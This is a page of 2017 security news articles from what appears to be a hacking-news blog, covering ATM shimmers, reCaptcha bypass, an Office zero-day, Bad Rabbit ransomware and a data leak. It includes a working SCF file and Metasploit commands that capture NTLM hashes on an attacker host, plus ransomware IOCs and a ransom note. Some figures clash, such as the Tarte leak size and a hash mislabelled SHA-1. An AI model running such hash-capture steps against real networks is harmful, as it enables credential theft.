Saturday, May 3, 2025
Home Blog Page 924

Undetectable ATM “Shimmers” Hacker’s Latest Tool for Steal your Chip Based Card Details from POS Terminal

Undetectable ATM  “Shimmers” Hacker’s Latest Tool for Steal your Chip Based Card Details from POS Terminal

Latest warning coming out from Canada about sophisticated ATM skimming called “Shimmers”  targeted chip-based credit and Debit cards to steal your entire card information form POS(Point-of-sale) terminal.

Basically many skimming devices record your card information in plain text on the magnetic stripe on the backs of cards.

Last Year November ATM based Skimmer has been detected a threat on ATM fraud devices known as “insert skimmers,”these thin data theft tools made to be completely hidden inside of a cash’s machine’s card acceptance slot.

In this case a chip-based device called shimmer has used in POS Machine which is used in Retailed store and other public areas for customer to make payment.

Earlier of this Const. Alex Bojic of the Coquitlam RCMP economic crime unit Published an Article said, Shimmers have rendered the bigger and bulkier skimmers virtually obsolete,

” A shimmer, on the other hand, is so named because it acts a shim that sits between the chip on the card and the chip reader in the ATM — recording the data on the chip as it is read by the ATM.”

They’ve already started popping up earlier of this Year in Canada and now police are warning ATM users around the world to be alert who all are using POS(Point-of-sale) Terminals.

Shimmers could be used to clone a magnetic stripe card.but its cannot used be used to fabricate a chip-based card.

The shimmers work by fitting inside a card reader. Once installed, the microchips on the shimmer record information from chip cards, including the PIN.

Also Read :  Advanced ATM penetration testing methods

What is  iCVV ?

iCVV Refers integrated circuit card verification value or “iCVV” for short — also known as a “dynamic CVV.”

The iCVV differs from the card verification value (CVV) stored on the physical magnetic stripe, and protects against the copying of magnetic-stripe data from the chip and using that data to create counterfeit magnetic stripe cards.

some banks have apparently not correctly implemented the chip card standard, known as EMV (short for Europay, Mastercard and Visa). so shimmers takes place and performing these attack.

Possible way to successful this Attack

ATM giant NCR Corp wrote in a 2016 alert ,The only way for this attack to be successful is if a [bank card] issuer neglects to check the CVV when authorizing a transaction.

“All issuers MUST make these basic checks to prevent this category of fraud. Card Shimming is not a vulnerability with a chip card, nor with an ATM, and therefore it is not necessary to add protection mechanisms against this form of attack to the ATM.”

That information is later extracted when the criminal inserts a special card — also during a purchase or cash withdrawal — which downloads the data. The information is then used to make fake cards.

“You can’t see a shimmer from the outside like the old skimmer version,” Bojic said in a statement .Businesses and consumers should immediately report anything abnormal about the way their card is acting … especially if the card is sticking inside the machine.”

Customers using the tap function of a chip card is one way to avoid being “shimmed.”It’s actually very secure. Each tap transfers very limited banking information, which can’t be used to clone your card.

GoCrack – Password Cracking Tool for Security Professionals to test Password Effectiveness

GoCrack – Password Cracking Tool for Security Professionals to test Password Effectiveness

Passwords are the basic way to keep our data secure, easy to guess passwords and re-use of the password will increase the risk of being compromised.

With the 2016’s most common passwords list, nearly 17 percent of people secured their account with password “123456” according to the survey by Darren Guccione from 10 million passwords collected from data breaches and public sources.

FireEye team released a password cracking tool GoCrack which allows security professionals to manage their passwords across multiple servers with easy to use web interface.

password cracking

The admin module needs to be deployed on the server where the worker on each GPU/CPU capable machine and the system will automatically distribute tasks over those GPU/CPU machines.

Also Read Offline Password attack with John the Ripper – Tutorial

Password cracking tools help security professionals to audit current passwords and it’s effectiveness.They are used in internal auditing as well as offensive/defensive operations.

We’re releasing GoCrack to provide another tool for distributed teams to have in their arsenal for managing password cracking and recovery tasks.said FireEye.

GoCrack allows only the administrators to view the cracked passwords and for other sensitive actions and users are not privileged for it.It includes support of hashcat v3.6+, so it dosen’t require any external database connection.

Now it supports for LDAP and database backed authentication, in future they planned to enhance with MySQL and Postgres for huge deployments.

GoCrack available to download from Github repository.

unCaptcha to Break reCaptcha System of Defense in 5.42 Seconds

unCaptcha to Break reCaptcha System of Defense in 5.42 Seconds

Captcha challenge is the first line of defense to protect the website against attacks, it challenges to prove that you are the human user.

Google’s ReCaptcha was introduced in 2014 and it is used by the significant number of users and it relies on advanced risk analysis engine and it offers audio and image captcha, here security researchers took audio captcha to attack.

Security researchers from UM present unCaptcha, a low-resource, fully automated attack on Google’s 2017 reCaptcha audio captcha with a high success rate.

We have evaluated unCaptcha using over 450 reCaptcha challenges from live websites, and showed that it can solve them with 85.15% accuracy in 5.42 seconds, on average: less time than it takes to even play the audio challenge! Researchers said.

To attack captcha one should have huge resources but anyway the success rate is very less.Here they provided a low resource attack with a high success rate.

Also Read Beware: Mass Ransomware Cyber Attack with “Bad Rabbit” Ransomware Hitting Many Government & Private organization

How unCaptcha works – Captcha

It is completely automated, they obtain audio samples and separated into segments for sound bites analysis and uploads to online speech recognization services like (IBM, Google Cloud, Google Speech Recognition, Sphinx, Wit-AI, Bing Speech Recognition).

captcha

And once the results are collected then it presents captcha solution.It is capable of locating “I’m not a robot” checkbox and clicks on it.Researchers also published the code of unCaptcha publically in Github.

Last February Researcher Discover “A logic vulnerability” dubbed ReBreakCaptcha that allows attackers to automate the process of bypassing reCAPTCHA fields. They published the source code in Github.

For mitigations they suggested in broadening the vocabulary of sound bites beyond just digits, adding background noise which makes the segmentation more difficult.

You can get full research paper titled unCaptcha: A Low-Resource Defeat of reCaptcha’s Audio Challenge available to download here.

All Versions of MS Office Affected with Critical Zero-day Vulnerability Allows Attackers Take Full Control of your System

All Versions of MS Office Affected with Critical Zero-day Vulnerability Allows Attackers Take Full Control of your System

A Critical MS Office Zero-day Remote Code Execution Vulnerability discovered in Microsoft Office that could allow attacker to take complete control of infected Windows Operating System and this vulnerability has been affected with all version of Microsoft Office.

This Zero-day vulnerability discovered in Office Open XML parser where Microsoft Office software fails to properly handle objects in memory.

Using this flow attacker could take full control of victims machine by run arbitrary code in the MS Office installed windows machine.

If the targetted machine running in administrative mode then attackers could take complete control and then install programs; view, change, or delete data; or create new accounts with full user rights.

sadly, this flow has presented in all the Microsoft office version which is running on all the different versions of Microsoft operating system.

Also Read : Hackers Can Steal Your Windows Login Credential Without User Interaction using New Windows OS Flow

How does This MS Office Zero-day Affected

Initially, Exploit this MS Office Zero-day vulnerability attack will send the malicious file with an affected version of Microsoft Office into victims.

An attacker can send the malicious exploitation file via mail to the user and convince the user to open the file. In this case, the attacker can’t force the user to open the file so that attacker Some Traditional social engineering method to convincing the user.

An Example Scenario, we have an Exploit RTF document containing a DOCX document that exploits this Zero-day Vulnerability within the Office Open XML parser.

This Exploit itself Contains word/document.xml  with valid ‘font’ element in the body of the Exploit.

In this case according to  ECMA-376 standard for Office Open XML File Formats valid ‘font’ element describing the fonts used in the document must look like this:

According to Kaspersky researchers, Exploit document failed to Close the tag </w:font> .  The opening tag <w:font> is followed by the object element <o:idmap/> which cause ‘type confusion’ in the OOXML parser. Any object element can be used to successfully exploit this vulnerability.

Also attacker will apply the popular heap spraying ( heap spraying is a technique used in exploits to facilitate arbitrary code execution) technique with use of ActiveX components to control memory address.

According to Microsoft, The security update addresses the vulnerability by correcting how Microsoft Office handles objects in memory. and assign the  CVE-2017-11826  for this MS Office Zero-day vulnerability .

This Flow patched by Microsoft and release the latest Patch update on Tuesday (17 October 2017) along with  62 vulnerabilities Patch.

Some of Major Affected Product

  • Microsoft Office Compatibility Pack Service Pack 3
  • Microsoft Office Online Server 2016
  • Microsoft Office Web Apps Server 2010 Service Pack 2
  • Microsoft Office Web Apps Server 2013 Service Pack 1
  • Microsoft Office Word Viewer
  • Microsoft SharePoint Enterprise Server 2016
  • Microsoft Word 2007 Service Pack 3
  • Microsoft Word 2010 Service Pack 2 (32-bit editions)
  • Microsoft Word 2010 Service Pack 2 (64-bit editions)
  • Microsoft Word 2013 RT Service Pack 1
  • Microsoft Word 2013 Service Pack 1 (32-bit editions)
  • Microsoft Word 2013 Service Pack 1 (64-bit editions)
  • Microsoft Word 2016 (32-bit edition)
  • Microsoft Word 2016 (64-bit edition)
  • Word Automation Services
  • Word Automation Services

Exploit for CVE-2017-11826 

  • MSWord.Agent.ix;
  • MSOffice.CVE-2017-11826.a;
  • HEUR:Exploit.MSOffice.Generic.

IOC Hash – SHA 1

cb3429e608144909ef25df2605c24ec253b10b6e99cbb6657afa6b92e9f32fb5

Get Wi-Fi Hacking with Kali Linux Lifetime Access Course 2017

Get Wi-Fi Hacking with Kali Linux Lifetime Access Course 2017

Today we want to introduce you to the “Get Wi-Fi Hacking with Kali Linux Course” powered by Stacksocial company.There is always a huge need WiFi for everyone and not only for using internet but for get into Target victims network and keep secure your network

This course aims to teach you in Wi-Fi Hacking using Kali Linux. After completing this course you will be confident with breaking the WiFi methods and mitigation to secure your network.

In this course, you will start as a beginner without or with low knowledge about WiFi security and Kali Linux just for $ 15 with Lifetime access content.

Network security is an essential to any home or corporate internet connection, which is why ethical hackers are paid big bucks to identify gaps and threats that can take a network down.

In this course, you’ll learn how to protect WEP, WPA, and WPA2 networks by using Kali Linux, one of the most popular tools for ethical hackers. By course’s end, you’ll have the know-how to protect network environments like a pro

To get the package at promo price $15 check here

Content Information

  • Access 22 lectures of content 24/7
  • Set up a penetration testing environment
  • Learn 4 different ways to install & use Kali Linux
  • Understand how to hack WEP-protect WiFi & learn countermeasures
  • Discover how to hack WiFi using Hydra, a keylogger, or by removing devices
More importantly, the course is valid for lifetime, it never ends, you can decide when to start and stop.You have unlimited access across all the devices you are having

Everything shown in the course is made for educational purposes only. In order to do penetration testing on network, web application, server or other devices(s) you must have written permission by the owner.

 

iOS Privacy issue – Now iPhone apps can Secretly access your Camera to take Videos and Pictures

iOS Privacy issue – Now iPhone apps can Secretly access your Camera to take Videos and Pictures

Google Security Engineer Felix Krause discovered a privacy loophole in iPhone which can be abused by the malicious iOS app to take videos and Pictures of user secretly.

In iPhone, once you grant permission app access to your camera it can take photos and video without your knowledge, uses front and back camera, also it can run facial recognition.

Krause discovered that once you grant full permission to app access your iPhone camera and anytime if the app turned back on it runs again with the same permission even if the permission revoked.

To demonstrate it Krause made a social network app that takes pictures and uploads on the feed without user’s permission. He also proved that it is possible to get some basic emotions right.

He also suggested some preventive measures for users, the first and the best way is to cover your camera wit came covers.Next one is to revoke camera access to all other apps than the inbuilt camera apps.

Proposals suggested

He suggested that Apple should provide an option to grant temporary access to camera and also some possible ways to alert users when the camera is active.

To show push notifications in the status bar or light indicator as like in Macbook.

Last September Felix Krause identified a permission issue, any camera app that has access to image library can extract the user locations from the image metadata.

When compared to Android Apple devices are considered to be more secure, but nowadays cyberattacks targetting Apple users are in raise.

Hackers Can Steal Your Windows Login Credential Without User Interaction using New Windows OS Flow

Hackers Can Steal Your Windows Login Credential Without User Interaction using New Windows OS Flow

Newly discovered dangerous Vulnerability in NTLM Architecture allows hackers to steal Windows NTLM password without any user interaction in all the  Recent Version Windows OS.

NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN), an older Microsoft product.

This vulnerability allows attackers can able to steal the NTLM hashes remotely without any user interaction using malicious SCF file that has to be placed in unprotected users windows machine.

NTLM

This vulnerability has 100% attack vector for users who have unprotected shared folder without a password. share folder protected users are safe by this dangerous attack and since windows have default shared folder protection will protect most of the WIndows user.

Worst case is that, this is normal behavior in offices, schools, hospitals and almost all Windows environments, people share folders left open to sharing music, photos, and documents.

How Does Hackers Steal the NTLM hashes

Initially, the attacker will discover the unprotected share folder target victim machine and share the malicious  SCF file(Shell Command File)  to execute some basic tasks.

Since we already have few of  SCF file attacks which required manual user interaction to successfully execute the SCF file for Performing some malicious activities but this flow has required no user interaction.

Here Attacker can be used some traditional method via email to send the malicious SCF file and install into victim machine.

Basic SCF File structure that contains the shell. command file share ad task bar information

Command=2
IconFile=\\192.168.1.101\share\test.ico
[Taskbar]
Command=ToggleDesktop

This Malicious SCF File will be executed using the Metasploit module to capture the NTLM hash form the victim’s machine.

root@sysadminjd:~# cat test.scf
[Shell]
Command=2
IconFile=\\192.168.1.111\share\test.ico
[Taskbar]
Command=ToggleDesktop
root@sysadminjd:~#
root@sysadminjd:~# msfconsole -q
msf >use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt
JOHNPWFILE = /tmp/smbhash.txt
msf auxiliary(smb) > exploit -j
[*] Auxiliary module running as background job
[*] Server started.

Once attackers Craft the NTLM hash form the Victims machine they will use some Public availble tool such as John the Ripper  to crack the NTLM  hashes and redrive the Windows Login Credentials.

According to the  Researcher,Diego who Discovered this critical vulnerability have suggested some useful mitigation techniques.

  1. Microsoft created a sort of patch to this vulnerability consisting in changing two registry keys to disable NTLM on the system. This registry keys are available only on Windows 10 and Windows Server 2016, and Microsoft has no intentions to backport to the other versions.
  2. Another issue is that disabling NTLM will break a lot of environments, and that’s a huge concern for them.
  3. My suggestion is to use strong passwords, after the attack we need to crack the hash, that can take a lot of time if the password is complex, and can be frustrating for the attacker.
  4. The better approach, don’t share folders without passwords, that’ll do the trick.
 

He has been reported this vulnerability on MAY 2017 and  finally Microsoft patch this Vulnerability in Oct 2017.

The patch is only for Windows 10 and Windows Server 2016 users. Older Windows versions remain vulnerable to this attack because the registry modifications are not compatible with older versions of the Windows Firewall.

Metasploit Can Be Directly Used For Hardware Penetration Testing Now

Metasploit Can Be Directly Used For Hardware Penetration Testing Now

Security researchers and penetration testers have used the open source Metasploit Framework to probe for vulnerabilities, run exploits, and simulate real-world attacks against software and networks .

Rapid7 has added a hardware bridge to its Metasploit penetration testing framework, making it easier for users to analyze Internet of Things (IoT) devices.

IoT’s growing up Vastly With more than 20 billion Internet of Things (IoT) devices expected by 2020 .IoT devices not only create new opportunities for attackers to invade networks to steal information, they can also be hacked to gain access to physical spaces and assets, or even cause harm to users.

As users become more dependent on the functionality of connected devices, the risk represented by loss of use or corrupted use becomes even greater.

Rapid7 announced the availability of a new Hardware Bridge API for Metasploit that extends the tool’s capabilities into the hardware realm.

Rapid7 Researcher’s said , ” The Hardware Bridge API extends Metasploit’s capabilities into the physical world of hardware devices. Much in the same way that the Metasploit framework helped unify tools and exploits for networks and software, the Hardware Bridge looks to do the same for all types of hardware”

Also Read : How to Launch a DoS Attack by using Metasploit Auxiliary

How does it work?

There are two ways to connect a physical device to Metasploit:

  1. Build support directly into your firmware to make your device Metasploit compatible, or
  2. Create a relay service.

A relay service is required if your device does not have a way to naturally communicate on Ethernet. Many useful hardware tools such as Software Defined Radio (SDR) devices are controlled solely through a USB port.

First Release of Metasploit Hardware Vulnerability Testing comes with support SocketCAN. Linux System can support CAN bus sniffer that support SocketCAN you can get started without anything else.

So CAN Bus can Directly Interact with local_hwbridge in Metasploit Auxiliary Module that can used in locally or on a remote machine.

Once your Hardware Device Connected with Metasploit installed system ,it will automatically detect any SocketCAN interfaces . In this simulations Tested in Vehicle based CAN Bus.

Next you need to connect to a relay or a supported piece of hardware to establish a HWBridge session.

HWBridge session will be established once it connected relay and you can open the session with CAN  Buses using meterpreter.

In order to connect an SDR device like this to Metaslpoit then the machine that SDR is connected to would run a relay service. This uses a REST API, the details of which can be found here: Metasploit Hardware Bridge API .

The initial release of the hardware bridge will focus on automotive capabilities, with extensions into other hardware verticals expected throughout the year, and joins a growing library of modules that target embedded, industrial, and hardware devices.

The initial release of the hardware bridge will focus on automotive capabilities, with extensions into other hardware verticals expected throughout the year, and joins a growing library of modules that target embedded, industrial, and hardware devices.
According to the Rapid7, Initial sample modules include capabilities on Controller Area Network (CAN bus), with plans for other bus systems, such as K-Line, to follow. Metasploit also currently includes a number of industrial control exploits for SCADA systems and auxiliary modules.

In addition to helping streamline vulnerability testing, the new capability will enable users to:

  • Conduct comprehensive quality assessments of hardware, supported by Metasploit’s extensive library of exploits
  • Leverage Metasploit as a learning and teaching tool for automotive and exotic hardware-based network research
  • Write exploits that utilize hardware tools without having to worry about vendor specifics
  • Use Metasploit to make automotive diagnostic decisions, removing the burden of low-level packet handling .

 

Famous Cosmetic Company “Tarte” leaked 2 Million Customers Personal Data Online

Famous Cosmetic Company “Tarte” leaked 2 Million Customers Personal Data Online

Newyork based Cosmetic Company Tarte’s leaked online around 3 million US and international customers data who shopped via their online store between 2008-2017 due to bad security setup measures in their mongo DB Server.

Sever Administrators of Tarte made up a security setting in public instead of keeping it Private leads to any one can access their all customers Private Data.

Tarte Data Leak followed by Major breaches Accenture, Equifax, Deloitte, ForresterDisqus, Yahoo R6DB DatabasePizza Hut, Hyatt ,Verizon and the incidents were reported within the little span of time.

There are 2 Misconfigured MongoDB databases that contain 3.8 and 4.9 GB in size of data each  DB’s and both are left open to access anyone in Public access that has been indexed by shodan.

 Apart from this, the data was accessed by ransomware group “CRU3LTY” who left their standard ransom note inside the database demanding 0.2 bitcoins for recovering the database once the data has been deleted or encrypted.
According to kromtech Security Reserachers  ,Cyber criminals in the past have used leaked information to reach out to customers with phishing emails and see who replies. In this instance they would already have the last 4 digits of the credit card on file and with 2 million customers they would have all of the personal information needed to trick them into believing they are confirming their credit card with a company they trust

Leaked data contains following information of  around Tarte’s 2 (exact number of records is 1,891,928) Million Customer

  • Customer name
  • Customer address
  • Customer address
  • Customer email
  • Purchase history
  • Last 4 digits of credit card

 It confirms that, Hackers have already accessed the customer data it is possible that criminals could even cross-reference this data against other breaches and get the customer’s full card number or more information.

On Friday 18 and 19th we have been trying to get in touch with Tarte and sent several security alerts. On Friday 20th all Tarte related databases have been secured, however, with no word from the company kromtech Security Said.

Beware : Mass Ransomware Cyber Attack with “Bad Rabbit” Ransomware Hitting Many Government & Private organization

Beware : Mass Ransomware Cyber Attack with “Bad Rabbit” Ransomware Hitting Many Government & Private organization

A New ransomware family called  “Bad Rabbit” rapidly spreading across the Eastern European countries affecting government and private agencies including Russia, Ukraine, Bulgaria,  and Turkey.

Bad Rabbit is a previously unknown ransomware family and it is distributing mostly via drive-by attacks using Adobe Flash player and no Exploit were used by this Bad Rabbit ransomware.

Drive-by Attacks cybercriminals look for insecure websites and plant a malicious script into HTTP or PHP code on one of the pages. This script may install malware directly onto the computer of someone who visits the site.

Bad Rabbit Rapidly spreading across the world same as Previously biggest Ransomware  Families Wannacry Petya, Locky outbreaks.

This ransomware dropper is distributed from fake Adobe Flash players installer “hxxp://1dnscontrol[.]com/flash_install.php” and victims are redirected to this malware web resource from legitimate news websites.

Adobe Flash Player based Malicious variant  install_flash_player.exe need to manually installed by Victim.

Kaspersky and Eset Researchers said, “Our researchers have detected a number of compromised websites, all news or media sites,” the Russian security company, now embroiled in controversy, writes on its blog. “Based on our investigation, this is a targeted attack against corporate networks, using methods similar to those used in the ExPetr attack. However, we cannot confirm it is related to ExPetr.”

Bad Rabbit also capable of scheduling talk with the name of dragon, as the malware makes reference to Daenerys Targaryen’s dragons and Grey Worm,

https://twitter.com/GossiTheDog/status/922859996609736710

Based on analysis by ESETEmsisoft, Bad Rabbit uses Mimikatz to extract credentials from the local computer’s memory, and along with a list of hard-coded credentials, it tries to use servers and workstations on the same network via SMB and WebDAV.

After installing the  install_flash_player.exe variant by victims then Finally computer will be Locked by Bad Rabbit and it will showing the following Ransom note.

Bad Rabbit Infected Machine

Later, Victims will be demanded to pay 0.05 Bitcoin to get decrypt key at the same time payment deadline time count also running in the Screen with a running timer which counting down toward an hour when the price goes up.

Bad Rabbit also can able to Encrypt the following file Extension which is presented to the victim’s computer.

.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer .cfg.conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail .mdb .msg.nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12 .p7b .p7c .pdf.pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw .qcow .qcow2 .rar .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml .xvd.zip

According to ESET report, Following countries, are the most infected by Bad Rabbit Ransomware.

  • Russia: 65%
  • Ukraine: 12.2%
  • Bulgaria: 10.2%
  • Turkey: 6.4%
  • Japan: 3.8%
  • Other: 2.4%

It’s interesting to note that all these big companies were all hit at the same time. It is possible that the group already had the foot inside their network and launched the watering hole attack at the same time as a decoy. ESET said.

Bad Rabbit Ransom Notes

Oops! Your files have been encrypted.

If you see this text, your files are no longer accessible.
You might have been looking for a way to recover your files.
Don't waste your time. No one will be able to recover them without our
decryption service.

We guarantee that you can recover all your files safely. All you
need to do is submit the payment and get the decryption password.

Visit our web service at caforssztxqzf2nm.onion

Your personal installation key#1:

C&C servers

  • Payment site: http://caforssztxqzf2nm[.]onion
  • Inject URL: http://185.149.120[.]3/scholargoogle/
  • Distribution URL: hxxp://1dnscontrol[.]com/flash_install.php

Embedded RSA-2048 Key:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3
tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwl
lpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7Y
TMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0
CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB 

IOCs:

  • http://1dnscontrol[.]com/
  • fbbdc39af1139aebba4da004475e8839 – install_flash_player.exe
  • 1d724f95c61f1055f0d02c2154bbccd3 – C:\Windows\infpub.dat
  • b14d8faf7f0cbcfad051cefe5f39645f – C:\Windows\dispci.exe